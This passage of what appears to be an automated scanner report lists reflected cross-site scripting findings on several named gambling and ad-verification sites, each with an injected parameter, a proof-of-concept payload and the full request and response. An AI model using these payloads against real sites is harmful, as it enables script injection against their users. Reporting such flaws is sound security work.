...[SNIP]...

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rtb50.doubleverify.com
Path:	/rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4a935<script>alert(1)</script>c320f4b1392 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5384441&plc=62171182&sid=1037707&num=5&ver=2&dv_url=http%3A//ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&callback=__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392 HTTP/1.1
Host: rtb50.doubleverify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 16 May 2011 12:52:00 GMT
Connection: close
Content-Length: 74

__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392(2)

3.28. http://scratch.co.uk/ [currency parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the currency request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52a7"><script>alert(1)</script>f3c08612d87 was submitted in the currency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?currency=USDf52a7"><script>alert(1)</script>f3c08612d87 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USDf52a7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef3c08612d87; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USDf52a7"><script>alert(1)</script>f3c08612d87', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.29. http://scratch.co.uk/ [currency parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the currency request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 737fc"%3balert(1)//814391c7445 was submitted in the currency parameter. This input was echoed as 737fc";alert(1)//814391c7445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?currency=USD737fc"%3balert(1)//814391c7445 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
monthlyprize: '£53,521,715',
topprizetext: 'Scratch &pound
...[SNIP]...

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/Lobby.aspx

Issue detail

The value of the CUR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef230'%3balert(1)//49f697934b was submitted in the CUR parameter. This input was echoed as ef230';alert(1)//49f697934b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/Lobby.aspx?CUR=GBPef230'%3balert(1)//49f697934b&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dxeuyd55fuapfle5trgjlp45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19499

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
UserName='-';
       var PlayMode='';
       var LastPage='-';
var Gender = '';
var Depositor = '';
var LastDepositStatus = '';
var ErrorCode='';
var Currency='GBPef230';alert(1)//49f697934b';
var Language='ENG';
       var iFrameIndex=0;

   var bRequestedClose = false; //Flag to indicate a close request to prevent double close of the window
   function ReloadPage(pLanguageCode,pCur
...[SNIP]...

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/Lobby.aspx

Issue detail

The value of the PRD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d09da'%3balert(1)//698914ca5c0 was submitted in the PRD parameter. This input was echoed as d09da';alert(1)//698914ca5c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=d09da'%3balert(1)//698914ca5c0&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xlhekov0yyaqd345yzm2mh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
,'EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7','','','','d09da';alert(1)//698914ca5c0',"")
                        </script>
...[SNIP]...

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/Lobby.aspx

Issue detail

The value of the UNIQUEVISITORID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac3b5'%3balert(1)//0fdbb5aef4f was submitted in the UNIQUEVISITORID parameter. This input was echoed as ac3b5';alert(1)//0fdbb5aef4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5'%3balert(1)//0fdbb5aef4f&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ar2sx145gmevit45fudsrcn4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
#2c62a0','0','EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5';alert(1)//0fdbb5aef4f','','','','',"")
                        </script>
...[SNIP]...

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the AR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8abcd'%3balert(1)//fdbdc8c0c01 was submitted in the AR parameter. This input was echoed as 8abcd';alert(1)//fdbdc8c0c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378abcd'%3balert(1)//fdbdc8c0c01&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3s4ea145uzdvo2upuhtuo3rc; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
tedClose = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=1301378abcd';alert(1)//fdbdc8c0c01&PAR=0'+'&Refresh=1' + '&WID=');
   }

   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var h
...[SNIP]...

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"style%3d"x%3aexpression(alert(1))"f1e0058e238 was submitted in the BD parameter. This input was echoed as 190db"style="x:expression(alert(1))"f1e0058e238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com190db"style%3d"x%3aexpression(alert(1))"f1e0058e238&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j3jz3quzo4m0ga55rqwealiz; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19506

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<meta content="info.Winnings.com190db"style="x:expression(alert(1))"f1e0058e238, The Best online scratch games in the world, More then 20 amazing online scratch games. Winnings & change your day!!!" name="description" />
...[SNIP]...

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b8'%3balert(1)//8816847b473 was submitted in the BD parameter. This input was echoed as 4a3b8';alert(1)//8816847b473 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com4a3b8'%3balert(1)//8816847b473&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=liapwh45d4ztmuyumndgtc45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com','','Winnings.com','info.Winnings.com4a3b8';alert(1)//8816847b473','', '','','','','',"")
                        </script>
...[SNIP]...

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the BO request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0b9'%3balert(1)//c208a0401a was submitted in the BO parameter. This input was echoed as 3f0b9';alert(1)//c208a0401a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PM&BO=FM3f0b9'%3balert(1)//c208a0401a&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cqorslb3q0irn1uxhyakm555; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19503

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PM','FM3f0b9';alert(1)//c208a0401a','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the PAR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68d70'%3balert(1)//3f67c728a9b was submitted in the PAR parameter. This input was echoed as 68d70';alert(1)//3f67c728a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137&AFI=3&PAR=068d70'%3balert(1)//3f67c728a9b&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oqzkg255itycuma3lquknh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
se = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=130137&PAR=068d70';alert(1)//3f67c728a9b'+'&Refresh=1' + '&WID=');
   }

   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var httpRes
...[SNIP]...

3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the RegistrationMode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9544'%3balert(1)//639feef7bad was submitted in the RegistrationMode parameter. This input was echoed as c9544';alert(1)//639feef7bad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PMc9544'%3balert(1)//639feef7bad&BO=FM&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jftp2x45snd0xury1lb4a3ir; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19505

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PMc9544';alert(1)//639feef7bad','FM','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.neogames-tech.com
Path:	/ScratchCards/lobby.aspx

Issue detail

The value of the SDN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69960'%3balert(1)//1a3d4ca2f9a was submitted in the SDN parameter. This input was echoed as 69960';alert(1)//1a3d4ca2f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com69960'%3balert(1)//1a3d4ca2f9a&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qknbln55rvubqmvtgokgqr45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com69960';alert(1)//1a3d4ca2f9a','','Winnings.com','info.Winnings.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.40. http://trk.primescratchcards.com/ [ac parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.primescratchcards.com
Path:	/

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 57616<script>alert(1)</script>3888a68dce1 was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ac=5157616<script>alert(1)</script>3888a68dce1&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 507
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=MEFGLCIAPBIIFMKKONEKHNHL; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 5157616<script>alert(1)</script>3888a68dce1 ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Micro
...[SNIP]...

3.41. https://www.aspireaffiliates.com/ [CMI parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc07"><script>alert(1)</script>964271dc4b6 was submitted in the CMI parameter. This input was echoed as ecc07\"><script>alert(1)</script>964271dc4b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=1ecc07"><script>alert(1)</script>964271dc4b6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=1ecc07\"><script>alert(1)</script>964271dc4b6" title="Home">
...[SNIP]...

3.42. https://www.aspireaffiliates.com/ [CMI parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Issue detail

The value of the CMI request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a96c</script><script>alert(1)</script>e23233807d6 was submitted in the CMI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?CMI=15a96c</script><script>alert(1)</script>e23233807d6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
